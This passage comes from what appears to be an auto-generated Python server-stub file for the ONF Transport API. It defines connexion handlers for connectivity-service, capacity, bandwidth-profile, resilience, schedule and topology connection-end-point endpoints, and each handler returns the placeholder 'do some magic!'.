:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_post(uuid, tapi_connectivity_connectivitycontext_connectivity_service=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_post
creates tapi.connectivity.connectivitycontext.ConnectivityService # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivitycontext_connectivity_service: tapi.connectivity.connectivitycontext.ConnectivityService to be added to list
:type tapi_connectivity_connectivitycontext_connectivity_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivitycontext_connectivity_service = TapiConnectivityConnectivitycontextConnectivityService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_put(uuid, tapi_connectivity_connectivitycontext_connectivity_service=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_put
creates or updates tapi.connectivity.connectivitycontext.ConnectivityService # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivitycontext_connectivity_service: tapi.connectivity.connectivitycontext.ConnectivityService to be added or updated
:type tapi_connectivity_connectivitycontext_connectivity_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivitycontext_connectivity_service = TapiConnectivityConnectivitycontextConnectivityService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_post(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_put(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_post(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_put(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_delete
removes tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_get
returns tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonBandwidthProfile
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_post(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_put(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_post(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_put(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_post(uuid, tapi_common_bandwidth_profile=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_post
creates tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added to list
:type tapi_common_bandwidth_profile: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_put(uuid, tapi_common_bandwidth_profile=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_put
creates or updates tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added or updated
:type tapi_common_bandwidth_profile: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_delete
removes tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_get
returns tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacity
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_post(uuid, tapi_common_capacity=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_post
creates tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity: tapi.common.Capacity to be added to list
:type tapi_common_capacity: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_put(uuid, tapi_common_capacity=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_put
creates or updates tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity: tapi.common.Capacity to be added or updated
:type tapi_common_capacity: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_post(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_put(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_resilience_type_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_resilience_type_delete
removes tapi.topology.ResilienceType # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_resilience_type_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_resilience_type_get
returns tapi.topology.ResilienceType # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiTopologyResilienceType
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_resilience_type_post(uuid, tapi_topology_resilience_type=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_resilience_type_post
creates tapi.topology.ResilienceType # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_topology_resilience_type: tapi.topology.ResilienceType to be added to list
:type tapi_topology_resilience_type: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_resilience_type = TapiTopologyResilienceType.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_resilience_type_put(uuid, tapi_topology_resilience_type=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_resilience_type_put
creates or updates tapi.topology.ResilienceType # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_topology_resilience_type: tapi.topology.ResilienceType to be added or updated
:type tapi_topology_resilience_type: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_resilience_type = TapiTopologyResilienceType.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristic_post(uuid, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristic_post
creates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added to list
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_delete(uuid, risk_characteristic_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_delete
removes tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_get(uuid, risk_characteristic_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_get
returns tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:rtype: TapiTopologyRiskCharacteristic
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_post(uuid, risk_characteristic_name, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_post
creates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added to list
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_put(uuid, risk_characteristic_name, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_put
creates or updates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added or updated
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_schedule_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_schedule_delete
removes tapi.common.TimeRange # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_schedule_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_schedule_get
returns tapi.common.TimeRange # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonTimeRange
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_schedule_post(uuid, tapi_common_time_range=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_schedule_post
creates tapi.common.TimeRange # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_time_range: tapi.common.TimeRange to be added to list
:type tapi_common_time_range: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_time_range = TapiCommonTimeRange.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_schedule_put(uuid, tapi_common_time_range=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_schedule_put
creates or updates tapi.common.TimeRange # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_time_range: tapi.common.TimeRange to be added or updated
:type tapi_common_time_range: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_time_range = TapiCommonTimeRange.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_delete(): # noqa: E501
"""data_context_connectivity_context_delete
removes tapi.connectivity.ConnectivityContext # noqa: E501
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_get(): # noqa: E501
"""data_context_connectivity_context_get
returns tapi.connectivity.ConnectivityContext # noqa: E501
:rtype: TapiConnectivityConnectivityContext
"""
return 'do some magic!'
def data_context_connectivity_context_post(tapi_connectivity_connectivity_context=None): # noqa: E501
"""data_context_connectivity_context_post
creates tapi.connectivity.ConnectivityContext # noqa: E501
:param tapi_connectivity_connectivity_context: tapi.connectivity.ConnectivityContext to be added to list
:type tapi_connectivity_connectivity_context: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_context = TapiConnectivityConnectivityContext.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_put(tapi_connectivity_connectivity_context=None): # noqa: E501
"""data_context_connectivity_context_put
creates or updates tapi.connectivity.ConnectivityContext # noqa: E501
:param tapi_connectivity_connectivity_context: tapi.connectivity.ConnectivityContext to be added or updated
:type tapi_connectivity_connectivity_context: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_context = TapiConnectivityConnectivityContext.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_aggregated_connection_end_pointtopology_uuidaggregated_connection_end_point_node_uuidnode_edge_point_uuidaggregated_connection_end_point_connection_end_point_uuid_get(uuid, node_uuid, owned_node_edge_point_uuid, connection_end_point_uuid, topology_uuid, aggregated_connection_end_point_node_uuid, node_edge_point_uuid, aggregated_connection_end_point_connection_end_point_uuid): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_aggregated_connection_end_pointtopology_uuidaggregated_connection_end_point_node_uuidnode_edge_point_uuidaggregated_connection_end_point_connection_end_point_uuid_get
returns tapi.connectivity.ConnectionEndPointRef # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:param topology_uuid: Id of aggregated-connection-end-point
:type topology_uuid: str
:param aggregated_connection_end_point_node_uuid: Id of aggregated-connection-end-point
:type aggregated_connection_end_point_node_uuid: str
:param node_edge_point_uuid: Id of aggregated-connection-end-point
:type node_edge_point_uuid: str
:param aggregated_connection_end_point_connection_end_point_uuid: Id of aggregated-connection-end-point
:type aggregated_connection_end_point_connection_end_point_uuid: str
:rtype: TapiConnectivityConnectionEndPointRef
"""
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_client_node_edge_pointtopology_uuidclient_node_edge_point_node_uuidnode_edge_point_uuid_get(uuid, node_uuid, owned_node_edge_point_uuid, connection_end_point_uuid, topology_uuid, client_node_edge_point_node_uuid, node_edge_point_uuid): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_client_node_edge_pointtopology_uuidclient_node_edge_point_node_uuidnode_edge_point_uuid_get
returns tapi.topology.NodeEdgePointRef # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:param topology_uuid: Id of client-node-edge-point
:type topology_uuid: str
:param client_node_edge_point_node_uuid: Id of client-node-edge-point
:type client_node_edge_point_node_uuid: str
:param node_edge_point_uuid: Id of client-node-edge-point
:type node_edge_point_uuid: str
:rtype: TapiTopologyNodeEdgePointRef
"""
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_get(uuid, node_uuid, owned_node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_get
returns tapi.connectivity.ceplist.ConnectionEndPoint # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiConnectivityCeplistConnectionEndPoint
"""
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_namevalue_name_get(uuid, node_uuid, owned_node_edge_point_uuid, connection_end_point_uuid, value_name): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_parent_node_edge_point_get(uuid, node_uuid, owned_node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_parent_node_edge_point_get
returns tapi.topology.NodeEdgePointRef # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiTopologyNodeEdgePointRef
"""
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_get(uuid, node_uuid, owned_node_edge_point_uuid): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_get
returns tapi.connectivity.context.topologycontext.topology.node.ownednodeedgepoint.CepList # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:rtype: TapiConnectivityContextTopologycontextTopologyNodeOwnednodeedgepointCepList
"""
return 'do some magic!'
